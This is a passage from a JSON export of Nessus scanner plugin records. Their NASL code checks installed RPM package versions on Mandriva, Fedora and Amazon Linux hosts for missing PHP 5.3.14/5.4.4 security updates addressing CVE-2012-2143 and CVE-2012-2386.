reference:\"php-pdo-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-pdo_dblib-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-pdo_mysql-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-pdo_odbc-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-pdo_pgsql-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-pdo_sqlite-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-pgsql-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-phar-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-posix-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-pspell-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-readline-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-recode-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-session-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-shmop-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-snmp-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-soap-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-sockets-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-sqlite-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-sqlite3-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-sybase_ct-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-sysvmsg-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-sysvsem-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-sysvshm-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-tidy-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-tokenizer-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-wddx-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-xml-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-xmlreader-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-xmlrpc-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-xmlwriter-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-xsl-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-zip-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-zlib-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:47", "description": "The PHP development team would like to announce the immediate\navailability of PHP 5.3.14. All users of PHP are encouraged to upgrade\nto PHP 5.3.14.\n\nThe release fixes multiple security issues: A weakness in the DES\nimplementation of crypt and a heap overflow issue in the phar\nextension.\n\nPHP 5.3.14 fixes over 30 bugs. Please note that the use of php://fd\nstreams is now restricted to the CLI SAPI\n\nChangelog: http://www.php.net/ChangeLog-5.php#5.3.14\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2012-07-03T00:00:00", "title": "Fedora 16 : maniadrive-1.2-32.fc16.6 / php-5.3.14-1.fc16 / php-eaccelerator-0.9.6.1-9.fc16.6 (2012-9762)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2386", "CVE-2012-2143"], "modified": "2012-07-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-eaccelerator", "p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:16", "p-cpe:/a:fedoraproject:fedora:maniadrive"], "id": "FEDORA_2012-9762.NASL", "href": "https://www.tenable.com/plugins/nessus/59827", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9762.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59827);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-2143\", \"CVE-2012-2386\");\n script_bugtraq_id(47545, 53729);\n script_xref(name:\"FEDORA\", value:\"2012-9762\");\n\n script_name(english:\"Fedora 16 : maniadrive-1.2-32.fc16.6 / php-5.3.14-1.fc16 / php-eaccelerator-0.9.6.1-9.fc16.6 (2012-9762)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The PHP development team would like to announce the immediate\navailability of PHP 5.3.14. All users of PHP are encouraged to upgrade\nto PHP 5.3.14.\n\nThe release fixes multiple security issues: A weakness in the DES\nimplementation of crypt and a heap overflow issue in the phar\nextension.\n\nPHP 5.3.14 fixes over 30 bugs. Please note that the use of php://fd\nstreams is now restricted to the CLI SAPI\n\nChangelog: http://www.php.net/ChangeLog-5.php#5.3.14\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.3.14\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=816956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=823594\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-July/083374.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ee1a615\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-July/083375.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0934de6c\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-July/083376.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2a1472c3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected maniadrive, php and / or php-eaccelerator\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:maniadrive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/07/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"maniadrive-1.2-32.fc16.6\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"php-5.3.14-1.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"php-eaccelerator-0.9.6.1-9.fc16.6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"maniadrive / php / php-eaccelerator\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:43", "description": "The PHP development team would like to announce the immediate\navailability of PHP 5.4.4. All users of PHP are encouraged to upgrade\nto PHP 5.4.4.\n\nThe release fixes multiple security issues: A weakness in the DES\nimplementation of crypt and a heap overflow issue in the phar\nextension.\n\nPHP 5.4.4 fixes over 30 bugs. Please note that the use of php://fd\nstreams is now restricted to the CLI SAPI\n\nChangelog: http://www.php.net/ChangeLog-5.php#5.4.4\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2012-07-01T00:00:00", "title": "Fedora 17 : maniadrive-1.2-41.fc17 / php-5.4.4-1.fc17 (2012-9490)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2386", "CVE-2012-2143"], "modified": "2012-07-01T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:php", "p-cpe:/a:fedoraproject:fedora:maniadrive"], "id": "FEDORA_2012-9490.NASL", "href": "https://www.tenable.com/plugins/nessus/59801", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9490.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59801);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-2143\", \"CVE-2012-2386\");\n script_xref(name:\"FEDORA\", value:\"2012-9490\");\n\n script_name(english:\"Fedora 17 : maniadrive-1.2-41.fc17 / php-5.4.4-1.fc17 (2012-9490)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The PHP development team would like to announce the immediate\navailability of PHP 5.4.4. All users of PHP are encouraged to upgrade\nto PHP 5.4.4.\n\nThe release fixes multiple security issues: A weakness in the DES\nimplementation of crypt and a heap overflow issue in the phar\nextension.\n\nPHP 5.4.4 fixes over 30 bugs. Please note that the use of php://fd\nstreams is now restricted to the CLI SAPI\n\nChangelog: http://www.php.net/ChangeLog-5.php#5.4.4\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.4.4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=816956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=823594\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/083317.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?23637f90\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/083318.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?390af9fa\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected maniadrive and / or php packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:maniadrive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"maniadrive-1.2-41.fc17\")) flag++;\nif (rpm_check(release:\"FC17\", reference:\"php-5.4.4-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"maniadrive / php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:18:18", "description": "Integer overflow in the phar_parse_tarfile function in tar.c in the\nphar extension in PHP before 5.3.14 and 5.4.x before 5.4.4 allows\nremote attackers to cause a denial of service (application crash) or\npossibly execute arbitrary code via a crafted tar file that triggers a\nheap-based buffer overflow.\n\nThe crypt_des (aka DES-based crypt) function in FreeBSD before\n9.0-RELEASE-p2, as used in PHP, PostgreSQL, and other products, does\nnot process the complete cleartext password if this password contains\na 0x80 character, which makes it easier for context-dependent\nattackers to obtain access via an authentication attempt with an\ninitial substring of the intended password, as demonstrated by a\nUnicode password.", "edition": 23, "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : php (ALAS-2012-95)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2386", "CVE-2012-2143"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php-recode", "p-cpe:/a:amazon:linux:php-debuginfo", "p-cpe:/a:amazon:linux:php-xml", "p-cpe:/a:amazon:linux:php-odbc", "p-cpe:/a:amazon:linux:php-mcrypt", "p-cpe:/a:amazon:linux:php-snmp", "p-cpe:/a:amazon:linux:php-mysqlnd", "p-cpe:/a:amazon:linux:php-mbstring", "p-cpe:/a:amazon:linux:php-cli", "p-cpe:/a:amazon:linux:php-embedded", "p-cpe:/a:amazon:linux:php-common", "p-cpe:/a:amazon:linux:php-ldap", "p-cpe:/a:amazon:linux:php-devel", "p-cpe:/a:amazon:linux:php-gd", "p-cpe:/a:amazon:linux:php-bcmath", "p-cpe:/a:amazon:linux:php-xmlrpc", "p-cpe:/a:amazon:linux:php-intl", "p-cpe:/a:amazon:linux:php", "p-cpe:/a:amazon:linux:php-process", "p-cpe:/a:amazon:linux:php-fpm", "p-cpe:/a:amazon:linux:php-pspell", "p-cpe:/a:amazon:linux:php-dba", "p-cpe:/a:amazon:linux:php-pdo", "p-cpe:/a:amazon:linux:php-pgsql", "p-cpe:/a:amazon:linux:php-imap", "p-cpe:/a:amazon:linux:php-mysql", "p-cpe:/a:amazon:linux:php-soap", "p-cpe:/a:amazon:linux:php-tidy", "p-cpe:/a:amazon:linux:php-mssql", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2012-95.NASL", "href": "https://www.tenable.com/plugins/nessus/69702", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-95.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69702);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2012-2143\", \"CVE-2012-2386\");\n script_xref(name:\"ALAS\", value:\"2012-95\");\n\n script_name(english:\"Amazon Linux AMI : php (ALAS-2012-95)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Integer overflow in the phar_parse_tarfile function in tar.c in the\nphar extension in PHP before 5.3.14 and 5.4.x before 5.4.4 allows\nremote attackers to cause a denial of service (application crash) or\npossibly execute arbitrary code via a crafted tar file that triggers a\nheap-based buffer overflow.\n\nThe crypt_des (aka DES-based crypt) function in FreeBSD before\n9.0-RELEASE-p2, as used in PHP, PostgreSQL, and other products, does\nnot process the complete cleartext password if this password contains\na 0x80 character, which makes it easier for context-dependent\nattackers to obtain access via an authentication attempt with an\ninitial substring of the intended password, as demonstrated by a\nUnicode password.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-95.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-bcmath-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-cli-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-common-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-dba-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-debuginfo-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-devel-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-embedded-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-fpm-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-gd-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-imap-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-intl-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-ldap-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mbstring-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mcrypt-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mssql-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mysql-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mysqlnd-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-odbc-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-pdo-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-pgsql-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-process-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-pspell-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-recode-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-snmp-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-soap-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-tidy-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-xml-5.3.14-2.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-xmlrpc-5.3.14-2.21.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:37", "description": "The releases complete a fix for a vulnerability in CGI-based setups\n(CVE-2012-2311).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2012-05-29T00:00:00", "title": 